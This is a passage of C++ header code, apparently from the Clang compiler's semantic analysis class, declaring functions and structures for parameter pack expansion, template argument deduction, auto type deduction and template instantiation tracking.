/// \param Template The template name that is being checked for unexpanded
/// parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(SourceLocation Loc,
TemplateName Template,
UnexpandedParameterPackContext UPPC);
/// If the given template argument contains an unexpanded parameter
/// pack, diagnose the error.
///
/// \param Arg The template argument that is being checked for unexpanded
/// parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(TemplateArgumentLoc Arg,
UnexpandedParameterPackContext UPPC);
/// Collect the set of unexpanded parameter packs within the given
/// template argument.
///
/// \param Arg The template argument that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(TemplateArgument Arg,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// template argument.
///
/// \param Arg The template argument that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(TemplateArgumentLoc Arg,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// type.
///
/// \param T The type that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(QualType T,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// type.
///
/// \param TL The type that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(TypeLoc TL,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// nested-name-specifier.
///
/// \param NNS The nested-name-specifier that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(NestedNameSpecifierLoc NNS,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// name.
///
/// \param NameInfo The name that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(const DeclarationNameInfo &NameInfo,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Invoked when parsing a template argument followed by an
/// ellipsis, which creates a pack expansion.
///
/// \param Arg The template argument preceding the ellipsis, which
/// may already be invalid.
///
/// \param EllipsisLoc The location of the ellipsis.
ParsedTemplateArgument ActOnPackExpansion(const ParsedTemplateArgument &Arg,
SourceLocation EllipsisLoc);
/// Invoked when parsing a type followed by an ellipsis, which
/// creates a pack expansion.
///
/// \param Type The type preceding the ellipsis, which will become
/// the pattern of the pack expansion.
///
/// \param EllipsisLoc The location of the ellipsis.
TypeResult ActOnPackExpansion(ParsedType Type, SourceLocation EllipsisLoc);
/// Construct a pack expansion type from the pattern of the pack
/// expansion.
TypeSourceInfo *CheckPackExpansion(TypeSourceInfo *Pattern,
SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions);
/// Construct a pack expansion type from the pattern of the pack
/// expansion.
QualType CheckPackExpansion(QualType Pattern,
SourceRange PatternRange,
SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions);
/// Invoked when parsing an expression followed by an ellipsis, which
/// creates a pack expansion.
///
/// \param Pattern The expression preceding the ellipsis, which will become
/// the pattern of the pack expansion.
///
/// \param EllipsisLoc The location of the ellipsis.
ExprResult ActOnPackExpansion(Expr *Pattern, SourceLocation EllipsisLoc);
/// Invoked when parsing an expression followed by an ellipsis, which
/// creates a pack expansion.
///
/// \param Pattern The expression preceding the ellipsis, which will become
/// the pattern of the pack expansion.
///
/// \param EllipsisLoc The location of the ellipsis.
ExprResult CheckPackExpansion(Expr *Pattern, SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions);
/// Determine whether we could expand a pack expansion with the
/// given set of parameter packs into separate arguments by repeatedly
/// transforming the pattern.
///
/// \param EllipsisLoc The location of the ellipsis that identifies the
/// pack expansion.
///
/// \param PatternRange The source range that covers the entire pattern of
/// the pack expansion.
///
/// \param Unexpanded The set of unexpanded parameter packs within the
/// pattern.
///
/// \param ShouldExpand Will be set to \c true if the transformer should
/// expand the corresponding pack expansions into separate arguments. When
/// set, \c NumExpansions must also be set.
///
/// \param RetainExpansion Whether the caller should add an unexpanded
/// pack expansion after all of the expanded arguments. This is used
/// when extending explicitly-specified template argument packs per
/// C++0x [temp.arg.explicit]p9.
///
/// \param NumExpansions The number of separate arguments that will be in
/// the expanded form of the corresponding pack expansion. This is both an
/// input and an output parameter, which can be set by the caller if the
/// number of expansions is known a priori (e.g., due to a prior substitution)
/// and will be set by the callee when the number of expansions is known.
/// The callee must set this value when \c ShouldExpand is \c true; it may
/// set this value in other cases.
///
/// \returns true if an error occurred (e.g., because the parameter packs
/// are to be instantiated with arguments of different lengths), false
/// otherwise. If false, \c ShouldExpand (and possibly \c NumExpansions)
/// must be set.
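///
/// Sketch of the usual call pattern (names other than the parameters are
/// assumptions for illustration):
/// \code
///   bool ShouldExpand = false, RetainExpansion = false;
///   Optional<unsigned> NumExpansions;
///   if (CheckParameterPacksForExpansion(EllipsisLoc, PatternRange, Unexpanded,
///                                       TemplateArgs, ShouldExpand,
///                                       RetainExpansion, NumExpansions))
///     return true; // inconsistent pack lengths; already diagnosed
///   if (ShouldExpand) {
///     // Expand the pattern NumExpansions times.
///   }
/// \endcode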
bool CheckParameterPacksForExpansion(SourceLocation EllipsisLoc,
SourceRange PatternRange,
ArrayRef<UnexpandedParameterPack> Unexpanded,
const MultiLevelTemplateArgumentList &TemplateArgs,
bool &ShouldExpand,
bool &RetainExpansion,
Optional<unsigned> &NumExpansions);
/// Determine the number of arguments in the given pack expansion
/// type.
///
/// This routine assumes that the number of arguments in the expansion is
/// consistent across all of the unexpanded parameter packs in its pattern.
///
/// Returns an empty Optional if the type can't be expanded.
Optional<unsigned> getNumArgumentsInExpansion(QualType T,
const MultiLevelTemplateArgumentList &TemplateArgs);
/// Determine whether the given declarator contains any unexpanded
/// parameter packs.
///
/// This routine is used by the parser to disambiguate function declarators
/// with an ellipsis prior to the ')', e.g.,
///
/// \code
/// void f(T...);
/// \endcode
///
/// to determine whether we have an (unnamed) function parameter pack or
/// a variadic function.
///
/// \returns true if the declarator contains any unexpanded parameter packs,
/// false otherwise.
bool containsUnexpandedParameterPacks(Declarator &D);
/// Returns the pattern of the pack expansion for a template argument.
///
/// \param OrigLoc The template argument to expand.
///
/// \param Ellipsis Will be set to the location of the ellipsis.
///
/// \param NumExpansions Will be set to the number of expansions that will
/// be generated from this pack expansion, if known a priori.
TemplateArgumentLoc getTemplateArgumentPackExpansionPattern(
TemplateArgumentLoc OrigLoc,
SourceLocation &Ellipsis,
Optional<unsigned> &NumExpansions) const;
/// Given a template argument that contains an unexpanded parameter pack, but
/// which has already been substituted, attempt to determine the number of
/// elements that will be produced once this argument is fully-expanded.
///
/// This is intended for use when transforming 'sizeof...(Arg)' in order to
/// avoid actually expanding the pack where possible.
Optional<unsigned> getFullyPackExpandedSize(TemplateArgument Arg);
//===--------------------------------------------------------------------===//
// C++ Template Argument Deduction (C++ [temp.deduct])
//===--------------------------------------------------------------------===//
/// Adjust the type \p ArgFunctionType to match the calling convention,
/// noreturn, and optionally the exception specification of \p FunctionType.
/// Deduction often wants to ignore these properties when matching function
/// types.
QualType adjustCCAndNoReturn(QualType ArgFunctionType, QualType FunctionType,
bool AdjustExceptionSpec = false);
/// Describes the result of template argument deduction.
///
/// The TemplateDeductionResult enumeration describes the result of
/// template argument deduction, as returned from
/// DeduceTemplateArguments(). The separate TemplateDeductionInfo
/// structure provides additional information about the results of
/// template argument deduction, e.g., the deduced template argument
/// list (if successful) or the specific template parameters or
/// deduced arguments that were involved in the failure.
enum TemplateDeductionResult {
/// Template argument deduction was successful.
TDK_Success = 0,
/// The declaration was invalid; do nothing.
TDK_Invalid,
/// Template argument deduction exceeded the maximum template
/// instantiation depth (which has already been diagnosed).
TDK_InstantiationDepth,
/// Template argument deduction did not deduce a value
/// for every template parameter.
TDK_Incomplete,
/// Template argument deduction did not deduce a value for every
/// expansion of an expanded template parameter pack.
TDK_IncompletePack,
/// Template argument deduction produced inconsistent
/// deduced values for the given template parameter.
TDK_Inconsistent,
/// Template argument deduction failed due to inconsistent
/// cv-qualifiers on a template parameter type that would
/// otherwise be deduced, e.g., we tried to deduce T in "const T"
/// but were given a non-const "X".
TDK_Underqualified,
/// Substitution of the deduced template argument values
/// resulted in an error.
TDK_SubstitutionFailure,
/// After substituting deduced template arguments, a dependent
/// parameter type did not match the corresponding argument.
TDK_DeducedMismatch,
/// After substituting deduced template arguments, an element of
/// a dependent parameter type did not match the corresponding element
/// of the corresponding argument (when deducing from an initializer list).
TDK_DeducedMismatchNested,
/// A non-dependent component of the parameter did not match the
/// corresponding component of the argument.
TDK_NonDeducedMismatch,
/// When performing template argument deduction for a function
/// template, there were too many call arguments.
TDK_TooManyArguments,
/// When performing template argument deduction for a function
/// template, there were too few call arguments.
TDK_TooFewArguments,
/// The explicitly-specified template arguments were not valid
/// template arguments for the given template.
TDK_InvalidExplicitArguments,
/// Checking non-dependent argument conversions failed.
TDK_NonDependentConversionFailure,
/// The deduced arguments did not satisfy the constraints associated
/// with the template.
TDK_ConstraintsNotSatisfied,
/// Deduction failed; that's all we know.
TDK_MiscellaneousDeductionFailure,
/// CUDA Target attributes do not match.
TDK_CUDATargetMismatch
};
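// Illustrative sketch of consuming a TemplateDeductionResult (Partial,
// TemplateArgs, and Loc are assumptions for illustration):
//
//   sema::TemplateDeductionInfo Info(Loc);
//   switch (DeduceTemplateArguments(Partial, TemplateArgs, Info)) {
//   case TDK_Success:
//     break; // Info now carries the deduced argument list
//   default:
//     return nullptr; // deduction failed; Info describes why
//   }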
TemplateDeductionResult
DeduceTemplateArguments(ClassTemplatePartialSpecializationDecl *Partial,
const TemplateArgumentList &TemplateArgs,
sema::TemplateDeductionInfo &Info);
TemplateDeductionResult
DeduceTemplateArguments(VarTemplatePartialSpecializationDecl *Partial,
const TemplateArgumentList &TemplateArgs,
sema::TemplateDeductionInfo &Info);
TemplateDeductionResult SubstituteExplicitTemplateArguments(
FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo &ExplicitTemplateArgs,
SmallVectorImpl<DeducedTemplateArgument> &Deduced,
SmallVectorImpl<QualType> &ParamTypes, QualType *FunctionType,
sema::TemplateDeductionInfo &Info);
/// \brief A function argument from which we performed template argument
/// deduction for a call.
struct OriginalCallArg {
OriginalCallArg(QualType OriginalParamType, bool DecomposedParam,
unsigned ArgIdx, QualType OriginalArgType)
: OriginalParamType(OriginalParamType),
DecomposedParam(DecomposedParam), ArgIdx(ArgIdx),
OriginalArgType(OriginalArgType) {}
QualType OriginalParamType;
bool DecomposedParam;
unsigned ArgIdx;
QualType OriginalArgType;
};
TemplateDeductionResult FinishTemplateArgumentDeduction(
FunctionTemplateDecl *FunctionTemplate,
SmallVectorImpl<DeducedTemplateArgument> &Deduced,
unsigned NumExplicitlySpecified, FunctionDecl *&Specialization,
sema::TemplateDeductionInfo &Info,
SmallVectorImpl<OriginalCallArg> const *OriginalCallArgs = nullptr,
bool PartialOverloading = false,
llvm::function_ref<bool()> CheckNonDependent = []{ return false; });
TemplateDeductionResult DeduceTemplateArguments(
FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo *ExplicitTemplateArgs, ArrayRef<Expr *> Args,
FunctionDecl *&Specialization, sema::TemplateDeductionInfo &Info,
bool PartialOverloading,
llvm::function_ref<bool(ArrayRef<QualType>)> CheckNonDependent);
TemplateDeductionResult
DeduceTemplateArguments(FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo *ExplicitTemplateArgs,
QualType ArgFunctionType,
FunctionDecl *&Specialization,
sema::TemplateDeductionInfo &Info,
bool IsAddressOfFunction = false);
TemplateDeductionResult
DeduceTemplateArguments(FunctionTemplateDecl *FunctionTemplate,
QualType ToType,
CXXConversionDecl *&Specialization,
sema::TemplateDeductionInfo &Info);
TemplateDeductionResult
DeduceTemplateArguments(FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo *ExplicitTemplateArgs,
FunctionDecl *&Specialization,
sema::TemplateDeductionInfo &Info,
bool IsAddressOfFunction = false);
/// Substitute Replacement for \p auto in \p TypeWithAuto
QualType SubstAutoType(QualType TypeWithAuto, QualType Replacement);
/// Substitute Replacement for auto in TypeWithAuto
TypeSourceInfo* SubstAutoTypeSourceInfo(TypeSourceInfo *TypeWithAuto,
QualType Replacement);
/// Completely replace the \c auto in \p TypeWithAuto by
/// \p Replacement. This does not retain any \c auto type sugar.
QualType ReplaceAutoType(QualType TypeWithAuto, QualType Replacement);
/// Result type of DeduceAutoType.
enum DeduceAutoResult {
DAR_Succeeded,
DAR_Failed,
DAR_FailedAlreadyDiagnosed
};
DeduceAutoResult
DeduceAutoType(TypeSourceInfo *AutoType, Expr *&Initializer, QualType &Result,
Optional<unsigned> DependentDeductionDepth = None,
bool IgnoreConstraints = false);
DeduceAutoResult
DeduceAutoType(TypeLoc AutoTypeLoc, Expr *&Initializer, QualType &Result,
Optional<unsigned> DependentDeductionDepth = None,
bool IgnoreConstraints = false);
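// A minimal sketch of auto deduction for a variable initializer (TSI, Init,
// and VDecl are assumptions for illustration):
//
//   QualType Deduced;
//   DeduceAutoResult DAR = DeduceAutoType(TSI, Init, Deduced);
//   if (DAR == DAR_Failed)
//     DiagnoseAutoDeductionFailure(VDecl, Init); // emit the generic diagnostic
//   else if (DAR == DAR_Succeeded)
//     VDecl->setType(Deduced); // hypothetical follow-up step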
void DiagnoseAutoDeductionFailure(VarDecl *VDecl, Expr *Init);
bool DeduceReturnType(FunctionDecl *FD, SourceLocation Loc,
bool Diagnose = true);
/// Declare implicit deduction guides for a class template if we've
/// not already done so.
void DeclareImplicitDeductionGuides(TemplateDecl *Template,
SourceLocation Loc);
QualType DeduceTemplateSpecializationFromInitializer(
TypeSourceInfo *TInfo, const InitializedEntity &Entity,
const InitializationKind &Kind, MultiExprArg Init);
QualType deduceVarTypeFromInitializer(VarDecl *VDecl, DeclarationName Name,
QualType Type, TypeSourceInfo *TSI,
SourceRange Range, bool DirectInit,
Expr *Init);
TypeLoc getReturnTypeLoc(FunctionDecl *FD) const;
bool DeduceFunctionTypeFromReturnExpr(FunctionDecl *FD,
SourceLocation ReturnLoc,
Expr *&RetExpr, AutoType *AT);
FunctionTemplateDecl *getMoreSpecializedTemplate(
FunctionTemplateDecl *FT1, FunctionTemplateDecl *FT2, SourceLocation Loc,
TemplatePartialOrderingContext TPOC, unsigned NumCallArguments1,
unsigned NumCallArguments2, bool Reversed = false);
UnresolvedSetIterator
getMostSpecialized(UnresolvedSetIterator SBegin, UnresolvedSetIterator SEnd,
TemplateSpecCandidateSet &FailedCandidates,
SourceLocation Loc,
const PartialDiagnostic &NoneDiag,
const PartialDiagnostic &AmbigDiag,
const PartialDiagnostic &CandidateDiag,
bool Complain = true, QualType TargetType = QualType());
ClassTemplatePartialSpecializationDecl *
getMoreSpecializedPartialSpecialization(
ClassTemplatePartialSpecializationDecl *PS1,
ClassTemplatePartialSpecializationDecl *PS2,
SourceLocation Loc);
bool isMoreSpecializedThanPrimary(ClassTemplatePartialSpecializationDecl *T,
sema::TemplateDeductionInfo &Info);
VarTemplatePartialSpecializationDecl *getMoreSpecializedPartialSpecialization(
VarTemplatePartialSpecializationDecl *PS1,
VarTemplatePartialSpecializationDecl *PS2, SourceLocation Loc);
bool isMoreSpecializedThanPrimary(VarTemplatePartialSpecializationDecl *T,
sema::TemplateDeductionInfo &Info);
bool isTemplateTemplateParameterAtLeastAsSpecializedAs(
TemplateParameterList *PParam, TemplateDecl *AArg, SourceLocation Loc);
void MarkUsedTemplateParameters(const Expr *E, bool OnlyDeduced,
unsigned Depth, llvm::SmallBitVector &Used);
void MarkUsedTemplateParameters(const TemplateArgumentList &TemplateArgs,
bool OnlyDeduced,
unsigned Depth,
llvm::SmallBitVector &Used);
void MarkDeducedTemplateParameters(
const FunctionTemplateDecl *FunctionTemplate,
llvm::SmallBitVector &Deduced) {
return MarkDeducedTemplateParameters(Context, FunctionTemplate, Deduced);
}
static void MarkDeducedTemplateParameters(ASTContext &Ctx,
const FunctionTemplateDecl *FunctionTemplate,
llvm::SmallBitVector &Deduced);
//===--------------------------------------------------------------------===//
// C++ Template Instantiation
//
MultiLevelTemplateArgumentList
getTemplateInstantiationArgs(NamedDecl *D,
const TemplateArgumentList *Innermost = nullptr,
bool RelativeToPrimary = false,
const FunctionDecl *Pattern = nullptr);
/// A context in which code is being synthesized (where a source location
/// alone is not sufficient to identify the context). This covers template
/// instantiation and various forms of implicitly-generated functions.
struct CodeSynthesisContext {
/// The kind of template instantiation we are performing
enum SynthesisKind {
/// We are instantiating a template declaration. The entity is
/// the declaration we're instantiating (e.g., a CXXRecordDecl).
TemplateInstantiation,
/// We are instantiating a default argument for a template
/// parameter. The Entity is the template parameter whose argument is
/// being instantiated, the Template is the template, and the
/// TemplateArgs/NumTemplateArguments provide the template arguments as
/// specified.
DefaultTemplateArgumentInstantiation,
/// We are instantiating a default argument for a function.
/// The Entity is the ParmVarDecl, and TemplateArgs/NumTemplateArgs
/// provides the template arguments as specified.
DefaultFunctionArgumentInstantiation,
/// We are substituting explicit template arguments provided for
/// a function template. The entity is a FunctionTemplateDecl.
ExplicitTemplateArgumentSubstitution,
/// We are substituting template arguments determined as part of
/// template argument deduction for either a class template
/// partial specialization or a function template. The
/// Entity is either a {Class|Var}TemplatePartialSpecializationDecl or
/// a TemplateDecl.
DeducedTemplateArgumentSubstitution,
/// We are substituting prior template arguments into a new
/// template parameter. The template parameter itself is either a
/// NonTypeTemplateParmDecl or a TemplateTemplateParmDecl.
PriorTemplateArgumentSubstitution,
/// We are checking the validity of a default template argument that
/// has been used when naming a template-id.
DefaultTemplateArgumentChecking,
/// We are computing the exception specification for a defaulted special
/// member function.
ExceptionSpecEvaluation,
/// We are instantiating the exception specification for a function
/// template which was deferred until it was needed.
ExceptionSpecInstantiation,
/// We are instantiating a requirement of a requires expression.
RequirementInstantiation,
/// We are checking the satisfaction of a nested requirement of a requires
/// expression.
NestedRequirementConstraintsCheck,
/// We are declaring an implicit special member function.
DeclaringSpecialMember,
/// We are declaring an implicit 'operator==' for a defaulted
/// 'operator<=>'.
DeclaringImplicitEqualityComparison,
/// We are defining a synthesized function (such as a defaulted special
/// member).
DefiningSynthesizedFunction,
/// We are checking the constraints associated with a constrained entity or
/// the constraint expression of a concept. This includes the checks that
/// atomic constraints have the type 'bool' and that they can be constant
/// evaluated.
ConstraintsCheck,
/// We are substituting template arguments into a constraint expression.
ConstraintSubstitution,
/// We are normalizing a constraint expression.
ConstraintNormalization,
/// We are substituting into the parameter mapping of an atomic constraint
/// during normalization.
ParameterMappingSubstitution,
/// We are rewriting a comparison operator in terms of an operator<=>.
RewritingOperatorAsSpaceship,
/// Added for template instantiation observation.
/// Memoization means we are _not_ instantiating a template because
/// it is already instantiated (but we entered a context where we
/// would have had to if it was not already instantiated).
Memoization
} Kind;
/// Was the enclosing context a non-instantiation SFINAE context?
bool SavedInNonInstantiationSFINAEContext;
/// The point of instantiation or synthesis within the source code.
SourceLocation PointOfInstantiation;
/// The entity that is being synthesized.
Decl *Entity;
/// The template (or partial specialization) in which we are
/// performing the instantiation, for substitutions of prior template
/// arguments.
NamedDecl *Template;
/// The list of template arguments we are substituting, if they
/// are not part of the entity.
const TemplateArgument *TemplateArgs;
// FIXME: Wrap this union around more members, or perhaps store the
// kind-specific members in the RAII object owning the context.
union {
/// The number of template arguments in TemplateArgs.
unsigned NumTemplateArgs;
/// The special member being declared or defined.
CXXSpecialMember SpecialMember;
};
ArrayRef<TemplateArgument> template_arguments() const {
assert(Kind != DeclaringSpecialMember);
return {TemplateArgs, NumTemplateArgs};
}
/// The template deduction info object associated with the
/// substitution or checking of explicit or deduced template arguments.
sema::TemplateDeductionInfo *DeductionInfo;
/// The source range that covers the construct that caused
/// the instantiation, e.g., the template-id that causes a class
/// template instantiation.
SourceRange InstantiationRange;
CodeSynthesisContext()
: Kind(TemplateInstantiation),
SavedInNonInstantiationSFINAEContext(false), Entity(nullptr),
Template(nullptr), TemplateArgs(nullptr), NumTemplateArgs(0),
DeductionInfo(nullptr) {}
/// Determines whether this template is an actual instantiation
/// that should be counted toward the maximum instantiation depth.
bool isInstantiationRecord() const;
};
/// List of active code synthesis contexts.
///
/// This vector is treated as a stack. As synthesis of one entity requires
/// synthesis of another, additional contexts are pushed onto the stack.
SmallVector<CodeSynthesisContext, 16> CodeSynthesisContexts;
/// Specializations whose definitions are currently being instantiated.
llvm::DenseSet<std::pair<Decl *, unsigned>> InstantiatingSpecializations;
/// Non-dependent types used in templates that have already been instantiated
/// by some template instantiation.
llvm::DenseSet<QualType> InstantiatedNonDependentTypes;
/// Extra modules inspected when performing a lookup during a template
/// instantiation. Computed lazily.
SmallVector<Module*, 16> CodeSynthesisContextLookupModules;
/// Cache of additional modules that should be used for name lookup
/// within the current template instantiation. Computed lazily; use
/// getLookupModules() to get a complete set.
llvm::DenseSet<Module*> LookupModulesCache;
/// Get the set of additional modules that should be checked during
/// name lookup. A module and its imports become visible when instantiating a
/// template defined within it.
llvm::DenseSet<Module*> &getLookupModules();
/// Map from the most recent declaration of a namespace to the most
/// recent visible declaration of that namespace.
llvm::DenseMap<NamedDecl*, NamedDecl*> VisibleNamespaceCache;
/// Whether we are in a SFINAE context that is not associated with
/// template instantiation.
///
/// This is used when setting up a SFINAE trap (see \c SFINAETrap) outside
/// of a template instantiation or template argument deduction.
bool InNonInstantiationSFINAEContext;
/// The number of \p CodeSynthesisContexts that are not template
/// instantiations and, therefore, should not be counted as part of the
/// instantiation depth.
///
/// When the instantiation depth reaches the user-configurable limit
/// \p LangOptions::InstantiationDepth we will abort instantiation.
// FIXME: Should we have a similar limit for other forms of synthesis?
unsigned NonInstantiationEntries;
/// The depth of the context stack at the point when the most recent
/// error or warning was produced.
///
/// This value is used to suppress printing of redundant context stacks
/// when there are multiple errors or warnings in the same instantiation.
// FIXME: Does this belong in Sema? It's tough to implement it anywhere else.
unsigned LastEmittedCodeSynthesisContextDepth = 0;
/// The template instantiation callbacks to trace or track
/// instantiations (objects can be chained).
///
/// These callbacks are used to print, trace, or track template
/// instantiations as they are being constructed.
std::vector<std::unique_ptr<TemplateInstantiationCallback>>
TemplateInstCallbacks;
/// The current index into pack expansion arguments that will be
/// used for substitution of parameter packs.
///
/// The pack expansion index will be -1 to indicate that parameter packs
/// should be instantiated as themselves. Otherwise, the index specifies
/// which argument within the parameter pack will be used for substitution.
int ArgumentPackSubstitutionIndex;
/// RAII object used to change the argument pack substitution index
/// within a \c Sema object.
///
/// See \c ArgumentPackSubstitutionIndex for more information.
class ArgumentPackSubstitutionIndexRAII {
Sema &Self;
int OldSubstitutionIndex;
public:
ArgumentPackSubstitutionIndexRAII(Sema &Self, int NewSubstitutionIndex)
: Self(Self), OldSubstitutionIndex(Self.ArgumentPackSubstitutionIndex) {
Self.ArgumentPackSubstitutionIndex = NewSubstitutionIndex;
}
~ArgumentPackSubstitutionIndexRAII() {
Self.ArgumentPackSubstitutionIndex = OldSubstitutionIndex;
}
};
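// Illustrative use of the RAII helper: substitute the I-th element of each
// pack, restoring the previous index on scope exit (SemaRef and I assumed):
//
//   {
//     Sema::ArgumentPackSubstitutionIndexRAII SubstIndex(SemaRef, I);
//     // ... perform the substitution for element I ...
//   } // previous ArgumentPackSubstitutionIndex restored here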
friend class ArgumentPackSubstitutionRAII;
/// For each declaration that involved template argument deduction, the
/// set of diagnostics that were suppressed during that template argument
/// deduction.
///
/// FIXME: Serialize this structure to the AST file.
typedef llvm::DenseMap<Decl *, SmallVector<PartialDiagnosticAt, 1> >
SuppressedDiagnosticsMap;
SuppressedDiagnosticsMap SuppressedDiagnostics;
/// A stack object to be created when performing template
/// instantiation.
///
/// Construction of an object of type \c InstantiatingTemplate
/// pushes the current instantiation onto the stack of active
/// instantiations. If the size of this stack exceeds the maximum
/// number of recursive template instantiations, construction
/// produces an error and \c isInvalid() will return true.
///
/// Destruction of this object will pop the named instantiation off
/// the stack.
struct InstantiatingTemplate {
/// Note that we are instantiating a class template,
/// function template, variable template, alias template,
/// or a member thereof.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
Decl *Entity,
SourceRange InstantiationRange = SourceRange());
struct ExceptionSpecification {};
/// Note that we are instantiating an exception specification
/// of a function template.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
FunctionDecl *Entity, ExceptionSpecification,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating a default argument in a
/// template-id.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
TemplateParameter Param, TemplateDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange = SourceRange());
/// Note that we are substituting either explicitly-specified or
/// deduced template arguments during function template argument deduction.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
FunctionTemplateDecl *FunctionTemplate,
ArrayRef<TemplateArgument> TemplateArgs,
CodeSynthesisContext::SynthesisKind Kind,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating as part of template
/// argument deduction for a class template declaration.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
TemplateDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating as part of template
/// argument deduction for a class template partial
/// specialization.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ClassTemplatePartialSpecializationDecl *PartialSpec,
ArrayRef<TemplateArgument> TemplateArgs,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating as part of template
/// argument deduction for a variable template partial
/// specialization.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
VarTemplatePartialSpecializationDecl *PartialSpec,
ArrayRef<TemplateArgument> TemplateArgs,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating a default argument for a function
/// parameter.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ParmVarDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange = SourceRange());
/// Note that we are substituting prior template arguments into a
/// non-type parameter.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
NamedDecl *Template,
NonTypeTemplateParmDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
/// Note that we are substituting prior template arguments into a
/// template template parameter.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
NamedDecl *Template,
TemplateTemplateParmDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
/// Note that we are checking the default template argument
/// against the template parameter for a given template-id.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
TemplateDecl *Template,
NamedDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
struct ConstraintsCheck {};
/// \brief Note that we are checking the constraints associated with some
/// constrained entity (a concept declaration or a template with associated
/// constraints).
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ConstraintsCheck, NamedDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
struct ConstraintSubstitution {};
/// \brief Note that we are checking a constraint expression associated
/// with a template declaration or as part of the satisfaction check of a
/// concept.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ConstraintSubstitution, NamedDecl *Template,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange);
struct ConstraintNormalization {};
/// \brief Note that we are normalizing a constraint expression.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ConstraintNormalization, NamedDecl *Template,
SourceRange InstantiationRange);
struct ParameterMappingSubstitution {};
/// \brief Note that we are substituting into the parameter mapping of an
/// atomic constraint during constraint normalization.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ParameterMappingSubstitution, NamedDecl *Template,
SourceRange InstantiationRange);
/// \brief Note that we are substituting template arguments into a part of
/// a requirement of a requires expression.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
concepts::Requirement *Req,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// \brief Note that we are checking the satisfaction of the constraint
/// expression inside of a nested requirement.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
concepts::NestedRequirement *Req, ConstraintsCheck,
SourceRange InstantiationRange = SourceRange());
/// Note that we have finished instantiating this template.
void Clear();
~InstantiatingTemplate() { Clear(); }
/// Determines whether we have exceeded the maximum
/// recursive template instantiations.
bool isInvalid() const { return Invalid; }
/// Determine whether we are already instantiating this
/// specialization in some surrounding active instantiation.
bool isAlreadyInstantiating() const { return AlreadyInstantiating; }
private:
Sema &SemaRef;
bool Invalid;
bool AlreadyInstantiating;
bool CheckInstantiationDepth(SourceLocation PointOfInstantiation,
SourceRange InstantiationRange);
InstantiatingTemplate(
Sema &SemaRef, CodeSynthesisContext::SynthesisKind Kind,
SourceLocation PointOfInstantiation, SourceRange InstantiationRange,
Decl *Entity, NamedDecl *Template = nullptr,
ArrayRef<TemplateArgument> TemplateArgs = None,
sema::TemplateDeductionInfo *DeductionInfo = nullptr);
InstantiatingTemplate(const InstantiatingTemplate&) = delete;
InstantiatingTemplate&
operator=(const InstantiatingTemplate&) = delete;
};
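// The canonical guard when entering an instantiation, sketched for
// illustration (PointOfInstantiation and Entity assumed in scope):
//
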